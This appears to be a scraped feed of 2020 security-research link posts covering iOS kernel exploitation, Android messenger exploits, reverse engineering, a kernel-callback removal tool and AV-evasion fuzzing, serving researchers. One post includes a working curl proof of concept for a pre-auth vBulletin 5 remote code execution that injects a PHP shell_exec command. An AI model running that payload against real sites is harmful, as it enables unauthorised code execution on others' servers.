The core of Apple is PPL (Apple's Page Protection Layer): Breaking the XNU kernel's kernel https://googleprojectzero.blogspot.com/2020/07/the-core-of-apple-is-ppl-breaking-xnu.html #exploitation #macos #ios #dukeBarman
Blogspot
The core of Apple is PPL: Breaking the XNU kernel's kernel
Posted by Brandon Azad, Project Zero While doing research for the one-byte exploit technique , I considered several ways it might be poss...
WasmBoxC: Simple, Easy, and Fast VM-less Sandboxing https://kripken.github.io/blog/wasm/2020/07/27/wasmboxc.html #exploitation #dukeBarman
kripken.github.io
WasmBoxC: Simple, Easy, and Fast VM-less Sandboxing
The software ecosystem has a lot of useful but unsafe code, and the easier it is to sandbox that code, the moreoften thatβll happen. If it were as simple as ...
A gentle introduction into ARM assembly https://www.shadowinfosec.io/2018/05/a-gentle-introduction-into-arm-assembly.html #reverse #dukeBarman
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques https://hot3eed.github.io/2020/07/30/starling_p1_obfuscations.html
Reverse Engineering Starling Bank (Part II): Jailbreak & Debugger Detection, Weaknesses & Mitigations https://hot3eed.github.io/2020/08/02/starling_p2_detections_mitigations.html
#reverse #ios #frida
Reverse Engineering Starling Bank (Part II): Jailbreak & Debugger Detection, Weaknesses & Mitigations https://hot3eed.github.io/2020/08/02/starling_p2_detections_mitigations.html
#reverse #ios #frida
hot3eed.github.io
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques 2020-07-30
Article: Removing Kernel Callbacks Using Signed Drivers
https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
Code: Enumerating and removing kernel callbacks using signed vulnerable drivers
https://github.com/br-sn/CheekyBlinder
#reverse #expdev #malware #darw1n
https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
Code: Enumerating and removing kernel callbacks using signed vulnerable drivers
https://github.com/br-sn/CheekyBlinder
#reverse #expdev #malware #darw1n
GitHub
GitHub - br-sn/CheekyBlinder: Enumerating and removing kernel callbacks using signed vulnerable drivers
Enumerating and removing kernel callbacks using signed vulnerable drivers - br-sn/CheekyBlinder
CVE-2020β9854: "Unauthd" (three) logic bugs ftw! https://objective-see.com/blog/blog_0x4D.html #macos #exploit #dukeBarman
objective-see.org
CVE-2020β9854: "Unauthd"
(three) logic bugs ftw!
Reverse-engineering and analysis of SanDisk High Endurance microSDXC card https://ripitapart.com/2020/07/16/reverse-engineering-and-analysis-of-sandisk-high-endurance-microsdxc-card/ #reverse #hardware
Rip It Apart - Jason's electronics blog-thingy
Reverse-engineering and analysis of SanDisk High Endurance microSDXC card
As seen on Hackaday! TL;DR β The SanDisk High Endurance cards use SanDisk/Toshiba 3D TLC Flash. It took way, way more work than it should have to figure this out (thanks for nothing, SanDisk!β¦
Exploiting Android Messengers with WebRTC: Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html #android #exploit #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 1
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in We...
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary https://github.com/sibears/IDAGolangHelper #ida #reverse #dukeBarman
GitHub
GitHub - sibears/IDAGolangHelper: Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary - sibears/IDAGolangHelper
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-4-completing-aslr-oracle.html #exploit #android #dukeBarman
Blogspot
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle
Posted by Mateusz Jurczyk, Project Zero This post is the fourth of a multi-part series capturing my journey from discovering a vulnerabl...
Why are Frida and QBDI a Great Blend on Android? https://blog.quarkslab.com/why-are-frida-and-qbdi-a-great-blend-on-android.html #android #frida #dukeBarman
Quarkslab
Why are Frida and QBDI a Great Blend on Android? - Quarkslab's blog
This blog post dives into how to get a better understanding of an Android native function by taking full advantage of both Frida and QBDI.
Announcing the Seventh Annual Flare-On Challenge https://www.fireeye.com/blog/threat-research/2020/08/announcing-the-seventh-annual-flare-on-challenge.html #reverse #CTF #dukeBarman
Google Cloud Blog
7th Annual Flare-On Challenge | Reverse Engineering Challenge | Google Cloud Blog
The Front Line Applied Research & Expertise (FLARE) team is honored to announce that the popular Flare-On challenge will return for a seventh year.
SVE-2019-15230: A bug collision https://allsoftwaresucks.blogspot.com/2020/08/sve-2019-15230-bug-collision.html #android #dukeBarman
Blogspot
SVE-2019-15230: A bug collision
Researchers from Team T5 recently published their write-up on exploiting a bug in S-Boot and obtaining code execution in the Samsung Secure ...
Exploiting Android Messengers with WebRTC: Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html #exploit #android #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 2
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in WebR...
Attack Secure Boot of SEP https://github.com/windknown/presentations/raw/master/Attack_Secure_Boot_of_SEP.pdf #exploitation #iOS #dukeBarman
Fuzzing the Windows API for AV Evasion
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
winternl
Fuzzing the Windows API for AV Evasion
Malware Detection Systems (MDSs) use a technique called emulation as perhaps their most effective weapon against novel malware threats. Emulation does not rely on the static structure or signature ofβ¦
https://arstechnica.com/information-technology/2020/08/snapdragon-chip-flaws-put-1-billion-android-phones-at-risk-of-data-theft/ #Gyokuyou
Ars Technica
Snapdragon chip flaws put >1 billion Android phones at risk of data theft
Thereβs no word on when Google and phone makers will incorporate fix from Qualcomm.
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1nCTF for #r2con2020 is officially open: https://ctf.radare.org/welcome.html #reverse #CTF #dukeBarman
Introduction to Whiteboxes and Collision-Based Attacks With QBDI
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
Quarkslab
Introduction to Whiteboxes and Collision-Based Attacks With QBDI - Quarkslab's blog
This post is a noob-friendly introduction to whiteboxes along with the presentation and explanation of a (not-new) collision-based attack. The attack is demonstrated against a public whitebox, using QBDI to instrument and analyze the target in order to produceβ¦